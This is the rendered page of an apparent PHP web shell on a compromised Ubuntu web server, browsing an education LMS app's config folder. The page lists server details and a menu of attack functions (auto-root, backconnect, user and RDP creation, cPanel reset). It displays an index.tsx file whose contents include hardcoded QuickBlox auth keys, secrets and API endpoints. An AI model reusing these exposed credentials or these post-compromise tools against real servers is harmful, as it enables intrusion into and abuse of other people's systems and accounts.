Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.api.tsx
500
B
-rw-r--r--
app.dev.tsx
64
B
-rw-r--r--
app.github.tsx
1.01
KB
-rw-r--r--
app.mock.tsx
353
B
-rw-r--r--
app.oauth-code.tsx
1.41
KB
-rw-r--r--
app.oauth-password.tsx
837
B
-rw-r--r--
app.prod.tsx
64
B
-rw-r--r--
common.tsx
312
B
-rw-r--r--
index.tsx
2.96
KB
-rw-r--r--
routes.tsx
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.tsx
import _merge from 'lodash-es/merge'; import { AuthState, UserInfo } from 'containers/auth/store/constant'; // Uncomment or define it in index.html to specify your environment. // window.__APP_ENV__ = 'github'; if(process.env.NODE_ENV == 'production'){ // window.__APP_API__ = 'https://lmsapi.yojanatech.com.np/api/v1/'; // window.__APP_URL__ = 'https://lmsapi.yojanatech.com.np'; window.__APP_API__ = 'https://lmsapi.drac.com.np/api/v1/'; window.__APP_URL__ = 'https://lmsapi.drac.com.np'; window.__QB_APP_ID__ = 85271; window.__QB_AUTH_KEY__ = 'u4vwXANCk9PBSZS'; window.__QB_AUTH_SECRET__ = 'BCRr3P9V8xG9uy4'; window.__QB_ACCOUNT_KEY__ = 'i46EgHAiRsdxcScFTAcV'; window.__QB_API_ENDPOINT__ = ''; window.__QB_CHAT_ENDPOINT__ = ''; } if(process.env.NODE_ENV == 'development'){ // window.__APP_API__ = 'https://lms.local/api/v1/'; // window.__APP_URL__ = 'https://lms.local'; window.__APP_API__ = 'https://lmsapi.drac.com.np/api/v1/'; window.__APP_URL__ = 'https://lmsapi.drac.com.np'; window.__QB_APP_ID__ = 85271; window.__QB_AUTH_KEY__ = 'u4vwXANCk9PBSZS'; window.__QB_AUTH_SECRET__ = 'BCRr3P9V8xG9uy4'; window.__QB_ACCOUNT_KEY__ = 'i46EgHAiRsdxcScFTAcV'; window.__QB_API_ENDPOINT__ = ''; window.__QB_CHAT_ENDPOINT__ = ''; } export enum AuthType { OAuth, // alias for OAuthCode OAuthCode, OAuthPassword, Custom, Mock, } export interface Config { resourceBaseUri?: string; defaultLocale?: string; locales?: {name: string; value: string; messages?: any}[]; authType?: AuthType; authConfig?: OAuthConfig; userConverter?: (backendUser: any) => UserInfo; logoutHandler?: (url: string, authState: AuthState) => void; } export interface OAuthConfig { clientId: string; clientSecret: string; authorizationUri: string; accessTokenUri?: string; userProfileUri: string; logoutUri: string; callbackUri?: string; scope?: string; } const getConfig = (): Config => { const env = window.__APP_ENV__ || process.env.NODE_ENV; // eslint-disable-next-line no-console console.info(`Application is running in '${env}' mode.`); switch(env){ case 'production': return (window.__APP_CONF__ = _merge( require('./app.dev'), require('./app.prod'), )); case 'development': return (window.__APP_CONF__ = _merge( require('./app.dev'), )); default: return (window.__APP_CONF__ = _merge( require(`./app.${env}`), )); } }; export const config = getConfig(); export { default as routes } from './routes'; export { default as frontRoutes } from 'containers/front/config/routes.front'; export { default as frontMenus } from 'containers/front/config/menus.front'; export { default as adminRoutes } from 'containers/admin/config/routes.admin'; export { default as adminMenus } from 'containers/admin/config/menus.admin';
Close